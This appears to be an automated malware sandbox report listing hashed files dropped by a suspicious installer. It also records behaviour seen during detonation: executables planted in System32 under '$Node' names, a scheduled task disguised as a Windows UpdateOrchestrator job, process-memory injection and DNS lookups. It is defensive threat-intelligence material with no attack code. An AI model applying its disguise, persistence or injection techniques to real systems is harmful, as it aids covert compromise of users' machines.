| MD5 | d7ebedbbf70c4ac7b2eac703d6eaa9a2 |
| SHA1 | d801b06a5b45a0633307d0b865f61b1cd07dea13 |
| SHA256 | e1f71c3c13bbb8c5ce30d97bbebe991a20376698a82fadfcd4091f0d31326dad |
| SHA512 | 9ca720402a13f55accda5a586f150dd48faede2f310d9726559c9d1ddc2ad7e0fed957874950ebd305d6be7102302dce4cf2f6e6909431d557aa8992714585bd |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\index.html
| MD5 | c7b752acf6d1e10f3aca2c67b1ccf4d3 |
| SHA1 | ab793cb43e0c2b5af0fdcbf90d0d29d5d3e164f7 |
| SHA256 | 69b9f99f6611f953d94984ac35bdaf9e9817f689e1e3614976bebe3465c613fc |
| SHA512 | 120addd79b7ade4f35b426c02631c8167d81080fde30a01b989453113f7547784e525d53bede41ede0c9b3caca8513060753ba51f75bf6936d32ee597d642576 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\libs\jquery-1.10.2.min.js
| MD5 | 44e3f0db3e4ab6fedc5758c05cf27591 |
| SHA1 | 2d408aa1d35661019c95adcc60b78c0727ed25b4 |
| SHA256 | bc44d3631ffef1df7960e359f02002d3ada45ee05205c2cf1edd85da2f518144 |
| SHA512 | 4d4844e53e686fc59a52e86588f328dca3ed6fdad7195c58942a98c51755a24981b903ee7c7b27785375eaad5a7d9501cf74b999674b79f214e66103bad9efdc |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\libs\cmp.bundle.js
| MD5 | deb60b40df89edecd35ea3d1410ef7a6 |
| SHA1 | 9899f48d1b29c6a51e4b80ce0579ec4f51b72c74 |
| SHA256 | 2eed337a035bfcba83bdf00686f236319bfdcdc5c5b4d57541cf855bfe4fd67a |
| SHA512 | 484daa9e6423c4aa90b310f7c957f850109afd4ef30ff0dc57e05d7ea30f9ae12dbed862197ac9f1ee99b26a7204ba14d1a95d8a8a6f5064a825e5d861fb8705 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\cri\template.js
| MD5 | 76c1ef0cb437db144c2bed53a5a8a5d7 |
| SHA1 | aaab8fff649f8e46d1e9510018118ee9abe01498 |
| SHA256 | 505d3c4de7d9cf8f0155b5b1a3c8792bc0ca2eda6781b441bd85455f144be22e |
| SHA512 | 822bf9feda91c89539d263c6c9053163e8dfa3c511195bc61a9b608b4687fb4048733323f03dd30a7ab661a4be4acf6c8d8ae7bb6723771122540a9551899c3e |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\modal\modal-controller.js
| MD5 | b04bdfd1c7d09bdbdb94a2455fdd677b |
| SHA1 | f000ba4866ff16d75bfd6cf446763498e19b12b1 |
| SHA256 | 4565ee81ffe222b31982088b1c18850076e3acf59198ebce08118e12cbd87ea1 |
| SHA512 | 3cb6ef0a16309046e7f407e7321eb12212b0eec09ec1a04b1d813f6c7a04546714865c3b398a93985041f598156ed905ebd23a64260801281b29ada9bc19ec5c |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\settings\template.js
| MD5 | 28513de0830383a516028e4a6e7585a0 |
| SHA1 | d31fc3a6f4a3ce6c4afb82ff2342a1ed718809e5 |
| SHA256 | 8014a7c919da249ba2f2196d9c9b62639d20851be426f3ffaef161cbe477c45f |
| SHA512 | 0f7321c2ae13145bb694368dae1b74e6fe20e6b09712da2178bc46e6aa65223ab84c38abbf0ed074c85b42dba1a238a5f3f8d1ae060a0af6df748c5befe11b61 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\welcome\welcome-controller.js
| MD5 | 50f676754862a2ab47a582dd4d79ecf3 |
| SHA1 | 1cb2f4b11f9f8cfc8dc57ff29d0256dec4811158 |
| SHA256 | 6155691dbdd66290109afb91617f9cf68af6bd912991d5d27b922f5faa7f530b |
| SHA512 | ccfc89e08fd36f0a694fcda17efb84ca285b6c62afe2e3a794fdad19b6882a4b618645f4d9171673ba56fb4c55fce336d6b8d26dec3a5cc11293ae2b211f499f |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\welcome\template.js
| MD5 | 17f54fca6723b983875d940d931e0afb |
| SHA1 | 01774cd5cea36bd74c80a708d6f77567e8091024 |
| SHA256 | 42c546e9da748ef76fdab56b96fd511eb607617a9ba37b3dc420148b769d8acb |
| SHA512 | 401df9a54cd14c19227d91bd08b4775a7b437644b4ca0d1d636d3e07b04591f9c5516e80040ae6a79ba400457d15e3d80aa148a63de870a64664fc5a02f7a038 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\cri\cri-controller.js
| MD5 | 4e4b4a9e2d86ae3c108105078db6d730 |
| SHA1 | 826946be793c999316af6c1db10523950b18ea2c |
| SHA256 | cee7fc5a36a01a439125be031923d7e7415ec56194255048098169a0108034b7 |
| SHA512 | 1420065cd000ce9b9c39d27b5dc5f4055f67146e06573a03184649851c9745f0c0af2b5e35b41b5923703dd74e32f9ed95fc59a43db25f854584e319950beffe |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\utils\modal-events-delegate.js
| MD5 | 117e4fdbdb0ecf211c8bd909efd337d1 |
| SHA1 | 9f8684d856b7c95bdffb139217dfd89f41373187 |
| SHA256 | 267661f932a2ea78d8c7a98cc03d1b18d7cb8132deb84636772ecd1fcfbe4857 |
| SHA512 | f474ee20b59d3d0c11f9f6aee6b6e2b66f7025beaec9841f88455e60533dc96cb4e27910be0dae92b0028c5578932b7f459fdb91d594ad010f72a3b3af6addb1 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\models\notifications.js
| MD5 | 911451f65b2503d23bc27c6a6aa6af72 |
| SHA1 | 01d3654b23ef7f5adeb4097bd851e8c100a7b2ab |
| SHA256 | c32495d55eed52f47dc7268eeccb90fb6bdc5686135ed089416c6bb8f703a578 |
| SHA512 | 06edaebb0bb2980a7b6d6baa31a9c0894a9bb5f14a91468ffb8f182d98f04bb811df2a4c37f0b56d612603528aa21f390eaa7cf885874ae770a24dce2f9b249c |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\utils\cookies.js
| MD5 | 6c60e675f8c8c68c0174b644d3a63a2a |
| SHA1 | 3635a3fe07ccc4a6f33a986ddb690522d0611abb |
| SHA256 | 9d3cb3822e20d6f5157faa02dc69bdaef44576c3fb5523e00aa152107ce30287 |
| SHA512 | 1dc9ec7b139bcf37107ecd673c01e4fcc606332ea1645a4a1b4e5d95f817d4c99d5964cd3d941a6a526689341d9623b17b4efc002cdf4c73404299d52b1be452 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\utils\commands.js
| MD5 | 186f2a801c3d12b8b53e4b8f0510bd35 |
| SHA1 | 567932df79e60d27d62752b1a1d72d6bf386c6b0 |
| SHA256 | bd6e86d0e6b33a44a1617458f0adff34a5cb0fc52568e03e5d74b8c72b5f379e |
| SHA512 | eb87666e8fb40f81d9f14f61a6cffdba57edce1ab9b62c1df3ea3ffb0f96747f90465b2bee956c096f3762d25e90f5f130537046d8deba388d183cee1cc473c3 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\utils\analytics.js
| MD5 | 525281e9959af4c1c0d11b9243c798a1 |
| SHA1 | 237a84c5b57bd132f48446d718b20640cb28c263 |
| SHA256 | c37f0699cf8ba7d9e3e0f73f1b2af65f4bdc2a31f44594ffc8c73e98b6c2fd1d |
| SHA512 | fe5bafda7773e69c65dd63270e0306abcd39cb2d886b675ab8c714ae0833efde963b69623d468551a1ab37f1db1a1d457f1568f7a29d9cf0bb23bb0edcab5fc4 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\utils\utils.js
| MD5 | a0952ebeab701c05c75710c33d725e7e |
| SHA1 | 1da8a2e889f1213d481ae3cd5571670c01e64adc |
| SHA256 | b4f0c48cbfeaf8141fd44b12031e3f0410cb0cdc313888ffdb14fdf1d2341246 |
| SHA512 | 5e5ae616d3fded7d2bf47a326242c4477ca3119fb52897bfb41de0be230ccbd6c3da2c00268b3973e9bf7b4f2886aba64fd9719b448662e4130ee66d87913389 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\utils\strings-loader.js
| MD5 | 9c94eb933d8a43dd3825e67a7e30c980 |
| SHA1 | 7ec7b16af6f399219209ba5967d377040486a11b |
| SHA256 | 96445709fde2613af50f4b8908296d4bfccdccb2d9db9febc34a9bf4dcc70ecf |
| SHA512 | a662a299e31633f71a9b9675970359430fdac06dcc284fd7ce92919f244c7f921639f97a42356e993a95865e6c9f198dcba82c126f82065bf2009a31ec9b02f5 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\block_inputs.js
| MD5 | b5b52c92b90f4283a761cb8a40860c75 |
| SHA1 | 7212e7e566795017e179e7b9c9bf223b0cdb9ec2 |
| SHA256 | f8dbd6793b35f7a26806f4dabad157aaafdf6d66fad094b50c77d60f223fd544 |
| SHA512 | 16ad53ede5424ca1384e3caea25225589e9eec9e80e2d845948802db90fad222f709a7b651cd7601a34ba67a0627433f25764638fd542cbd4612871308e7b353 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\progress\template.js
| MD5 | 92b145e6649ba0add3dee9a69d3fa91e |
| SHA1 | 4db1a45392ec973cc8a7eecf3a30a9a7ecc7a64d |
| SHA256 | a7128a08bca53dd919cab3e5cb4dab31ded7ae2dafc957209b9fdd23f3b944ab |
| SHA512 | 747a087dffdba5c92d9f4c8923615d388b9c4c79d3b71d3cb90487aa37c132290a4f5107eef3055c03eadcb9614e20d4655393dc9251fab7e0ee2438f0d95751 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\privacy\privacy-controller.js
| MD5 | 15bbec339f5046f525e3aa96d36c30ec |
| SHA1 | f73d40bf06584737fe327f1eec6f4b0446545226 |
| SHA256 | 14d9c60cd97f18e74fee2dd80b6a190eaccc526085991f356feb6b4d330a0fc3 |
| SHA512 | 2b0edfd2d5efb3f739e56eb6f3bcfae4789af3e1639f5f8e5f7530f5af10eb1a61464d665c9d9b2f4eb3796f2445108599d8bea75f1709aa562feebee519da4e |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\privacy\template.js
| MD5 | cf8d2c26520d7c84e560dfa79e31dcd3 |
| SHA1 | 716f2ec17480d5cc9c145bc147833fbfc39d36f0 |
| SHA256 | 95c459eae0edccdb94702aea603a097e461daa0e5f37dcd0e30de7df665433a8 |
| SHA512 | d466dcf7e86a4295857020feea281fc89f519f6bf1e79c3b5e1046d0745c9c9010377b1941e06c9a9b2c78a4173ed9909332d5d6c39b05f460e8a863086c895b |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\progress\progress-1-controller.js
| MD5 | 82f0b997ed552c52a510a9f2ab29dc3a |
| SHA1 | 92aec3a656053c71eccdde610130f5d8008fa96f |
| SHA256 | 838bab990ce38372dfedb50eb0a270db705811729630ab8557c08bd1e9e8e105 |
| SHA512 | ecf67f877002d746eff8af3a50155aa381513ddafd17b6bff0188c85f0765579fea0112e82e1371f962b1f5decc94b65e6120f21fb516533dac35a2d541065bf |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\app.js
| MD5 | de88fce9253d26e0c61daa1783baa775 |
| SHA1 | 07c5848354a247056baad369059aac9d3c940ecc |
| SHA256 | 993f140f9f4e5cdbdcc657a3c159328bf58b3483dbc27c451516a556763a79ba |
| SHA512 | 71ddd47ef7ed7c02fb31e8ffa2ea6d1b5178dbda2ab37bac208e088c8ba2127e0cf5eaa74ee7ad5809fa69e534853312c6c8775c68aeda63bf0e4a5caefa39b7 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\finish-with-recommended-app\finish-with-recommended-app-controller.js
| MD5 | eb6d6bd7e05d4477e2704dd87b57ca35 |
| SHA1 | f42672ec1e23a3f4bcc2952746d87ba8deff44be |
| SHA256 | 5ca97132a258ed1f36e401d70ccb95be2c9e18395e6010c40f61172914477de5 |
| SHA512 | 1402d611f910cf5078e804175fa4693b591348d3e7cf6d0a6bbe026c259eb9e0bc285233c80cb2f4690674c3e927bc72fbdcbe758826b98fd02ecb3ed82e339a |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\finish-with-recommended-app\template.js
| MD5 | d1cb34b57cef7e28b9286454b197b712 |
| SHA1 | f3a964b319bab82d4eda07e126bbfd6dec35c349 |
| SHA256 | b61dfc304b46e8cd95d7b15bb93c6160b30523a1a093397a84fc8b8bed00ac42 |
| SHA512 | 3a07de9c58134edbb7998f85e6d037a0cd066e32c4daa07594a949a7574f5693153bbcdb59739e1a92e847ab1128e2369fb30ba76a7b9cdfa9a37a409db691c1 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\finish\finish-controller.js
| MD5 | 138240ea22084428e9e25583e9156568 |
| SHA1 | e8bef7eab5b6e7040b996ec9504436e073444bd9 |
| SHA256 | 4cb4e1aa25c15ae5f2e63fa4658a8acff0ce63e0f59cb6eb634df2dfe336e2ec |
| SHA512 | e97b81b0ecd964e6e909019353efe4f5582f65763ac4197d754f1c4eea19cfc249900ae597fd33e29f531bb0d1c7e0f010793c59a2b0099fa75ad0b7d01ce8a7 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\finish\template.js
| MD5 | f092de7ea66d8e920b345f38537fa35d |
| SHA1 | 82d107a409f18878307ae0cefe24074db64937c4 |
| SHA256 | b05f111369e12ecb4cdc6526dd554061eb31097aa0de4bd126ddc185b69d922f |
| SHA512 | 14942c0122f216c07595cbaae498f9c4d37a2d0fd95f262c332502befdf4566c7a042c4d85702c1d82a111123dde677096195e9efeb1d74eb1dfd4df84d01a23 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\main\main-controller.js
| MD5 | 15b665a5c915004e1aa7e9e11a710f7e |
| SHA1 | 7821924e42bb19d60c572ff80bbaaa04d7aaeefb |
| SHA256 | 84dc33e2eb3118fc77a38b0ca53af42c53f6eb85cfb1e8737dbe39fa03515653 |
| SHA512 | dd47f7bac0dbaac714e6d2fc91b4c24756ca4acb70bdbc4b54cd5216552d6bb85ba2e1c3c8445c5fb40d116dfab6569945cd74730bb7c8f3cf46e8d08f8afa02 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\main\template.js
| MD5 | a118c7724c208f12083240cafccfd10b |
| SHA1 | f89c676a215b869626737862a08c9eb07d440211 |
| SHA256 | 63a43bb08403972d0f4b0e381bd264af14e826e0035242bc1baa9a815956b8fc |
| SHA512 | 9fede79044ae5de7baf5bfba0d5a515ce462a25420026ff45bcf1751e57510023cb40df42d08e880114f62b38ddb218355d5357b725df32a41ae4e6a18414cb3 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\js\windows\settings\settings-controller.js
| MD5 | 378c18dd7d5cee6ca7c4ddd0396b535b |
| SHA1 | d5f81d4fab29201fd1629dc4d8e6f918c0c30479 |
| SHA256 | b5c5dc5e0684fd97eb4c45896dc1c2de8a6a6fdc63b6aa83a99103c15787ef35 |
| SHA512 | c29416b3f0245f4826d857dc8c52c969071d2410c945bda96f38f59a9bc7137ee534d84865e5ac55a1e3cea6bb705c5d592725af709cd97e7f38ff05dbaafe5b |
memory/3720-265-0x0000020A80710000-0x0000020A80EB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\assets\fonts\lato\LatoLatin-Regular.eot
| MD5 | 6cfad5881181ae658a6efdd68889a690 |
| SHA1 | 5b54f6ccc20ed3a078fbdf94d7a68ac80002624d |
| SHA256 | c6c970b103b3c3aa83f7a45172619a4451ea5f015f9f3ef4fd08c9a4aa895cbc |
| SHA512 | ddd3d43540eb3d4eef48d0834136de1e7bf23a52f286d0a666cf57c7d685aadf1cea6d37c88f9d7ce5ad6143d7c3213f54b16a11f616b7dce154bba50997bbe7 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 3eb3833f769dd890afc295b977eab4b4 |
| SHA1 | e857649b037939602c72ad003e5d3698695f436f |
| SHA256 | c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485 |
| SHA512 | c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6a807b1c91ac66f33f88a787d64904c1 |
| SHA1 | 83c554c7de04a8115c9005709e5cd01fca82c5d3 |
| SHA256 | 155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256 |
| SHA512 | 29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200 |
memory/3720-279-0x00000202012B0000-0x0000020201A1B000-memory.dmp
C:\Windows\System32\$Node32.exe
| MD5 | b850f016450d68da0ae4bb945355f70c |
| SHA1 | 521726c38af715e6ee1c76315151f0ed9518c6f4 |
| SHA256 | 8a649909d1defa1b8966cde6ad854f3cbf7662a732cf1a16b853c793cf240d24 |
| SHA512 | 30f152e08ba44308da9b9c42951e45a9b6c2ad808c3a426da4af0384939816e04f1faf38de1d3c404e515d90b2e2eaeabe152b0151fb3f21c6a00bd2fdac3b6c |
memory/1300-399-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-398-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-397-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-406-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-404-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-410-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-408-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-409-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-407-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-405-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1bb3948f455f76085a320e6ecf3b884d |
| SHA1 | 9b3629bb1814ebd5d6143eaee9a7447767974b5f |
| SHA256 | ab7956ac7fb0780b1c36bdd9f1574e9d6a75eb8a84e4db0d5a19bc4101cc44a0 |
| SHA512 | 17f0324dbf79462f1d4da9ccec167289e719595dc82afeae05b0a1309b5ce5e7c446dbace832db3642fac07896bee80714cd893dc0c9b48b7fbec38c91363f6b |
C:\Windows\System32\$Node2Json.exe
| MD5 | 41814c2aa6f0aaffaaaa26ffd07b3550 |
| SHA1 | ea9731c42a382ed003b5b4bfd28c3ba437c8d14a |
| SHA256 | da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e |
| SHA512 | f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d |
memory/2004-461-0x0000000000830000-0x0000000000852000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e2844b0cc903fcf9cb8f75bbb2c74293 |
| SHA1 | 61dd6066b0f4ac530680955ebdb0a85891d7e874 |
| SHA256 | b525765eef8dcc4c01eab3e0781c66ddd59526bb27d2d85bdd12555bb66e6187 |
| SHA512 | 0d68c027296e019ee580e8d523f335be52dead99cd1c66331fc4c853037c271d9a50ad31eb07b6344aab9e5baae37fac868bbd0497184a8b46dd9ab30c6c6497 |
C:\Windows\System32\$Node3Json.exe
| MD5 | 391d4f99d0076ce566b370f1572ef670 |
| SHA1 | 0bf04beb77440315098bacf30563a6542e254a45 |
| SHA256 | b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605 |
| SHA512 | 1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497 |
memory/3140-491-0x0000000000AD0000-0x0000000000AF2000-memory.dmp
memory/908-493-0x000001F527610000-0x000001F52763A000-memory.dmp
memory/908-494-0x00007FF9F47B0000-0x00007FF9F49A8000-memory.dmp
memory/908-495-0x00007FF9F2BA0000-0x00007FF9F2C5D000-memory.dmp
memory/620-499-0x0000000140000000-0x0000000140008000-memory.dmp
memory/620-498-0x0000000140000000-0x0000000140008000-memory.dmp
memory/620-497-0x0000000140000000-0x0000000140008000-memory.dmp
memory/620-496-0x0000000140000000-0x0000000140008000-memory.dmp
memory/620-503-0x0000000140000000-0x0000000140008000-memory.dmp
memory/620-504-0x00007FF9F47B0000-0x00007FF9F49A8000-memory.dmp
memory/620-505-0x00007FF9F2BA0000-0x00007FF9F2C5D000-memory.dmp
memory/620-506-0x0000000140000000-0x0000000140008000-memory.dmp
memory/624-510-0x00000251F5C30000-0x00000251F5C5A000-memory.dmp
memory/624-517-0x00007FF9B4830000-0x00007FF9B4840000-memory.dmp
memory/624-516-0x00000251F5C30000-0x00000251F5C5A000-memory.dmp
memory/624-511-0x00000251F5C30000-0x00000251F5C5A000-memory.dmp
memory/624-509-0x00000251F5BA0000-0x00000251F5BC5000-memory.dmp
memory/676-527-0x00007FF9B4830000-0x00007FF9B4840000-memory.dmp
memory/676-526-0x000001D51FE00000-0x000001D51FE2A000-memory.dmp
memory/676-521-0x000001D51FE00000-0x000001D51FE2A000-memory.dmp
memory/956-531-0x0000028338BD0000-0x0000028338BFA000-memory.dmp
memory/956-537-0x00007FF9B4830000-0x00007FF9B4840000-memory.dmp
memory/956-536-0x0000028338BD0000-0x0000028338BFA000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 4ac1741ceb19f5a983079b2c5f344f5d |
| SHA1 | f1ebd93fbade2e035cd59e970787b8042cdd0f3b |
| SHA256 | 7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc |
| SHA512 | 583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | a9124c4c97cba8a07a8204fac1696c8e |
| SHA1 | 1f27d80280e03762c7b16781608786f5a98ff434 |
| SHA256 | 8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21 |
| SHA512 | 537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392 |
Analysis: behavioral28
Detonation Overview
Submitted
2024-12-02 16:10
Reported
2024-12-02 16:14
Platform
win10ltsc2021-20241023-en
Max time kernel
95s
Max time network
142s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RDR4.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5060 wrote to memory of 1312 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe | C:\Users\Admin\AppData\Local\Temp\RDR4.exe |
| PID 5060 wrote to memory of 1312 | N/A | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe | C:\Users\Admin\AppData\Local\Temp\RDR4.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\stTfuo8I.exe"
C:\Users\Admin\AppData\Local\Temp\RDR4.exe
"C:\Users\Admin\AppData\Local\Temp\RDR4.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
Files
memory/5060-0-0x00007FF98B8D3000-0x00007FF98B8D5000-memory.dmp
memory/5060-1-0x0000000000F20000-0x00000000013F2000-memory.dmp
memory/5060-3-0x00007FF98B8D0000-0x00007FF98C392000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RDR4.exe
| MD5 | e685b0c231a5f25f451e3b1628c3a55d |
| SHA1 | 6546666fb75e56302f140db8c8e9299e2ae1175b |
| SHA256 | 65d2f65bcb32cba0a2d920bec6b139bf5de4de8ad2d44db7ad7bb36035665797 |
| SHA512 | f991446d9b556bf00c25f348000a75bda67571f0de53a9947c679f483bdae8e7d28728270de530d833321a484a7050c96b57a3c10273bba87e04dd8f07cc03a4 |
memory/1312-13-0x00007FF6708A0000-0x00007FF6708CD000-memory.dmp
memory/5060-17-0x00007FF98B8D0000-0x00007FF98C392000-memory.dmp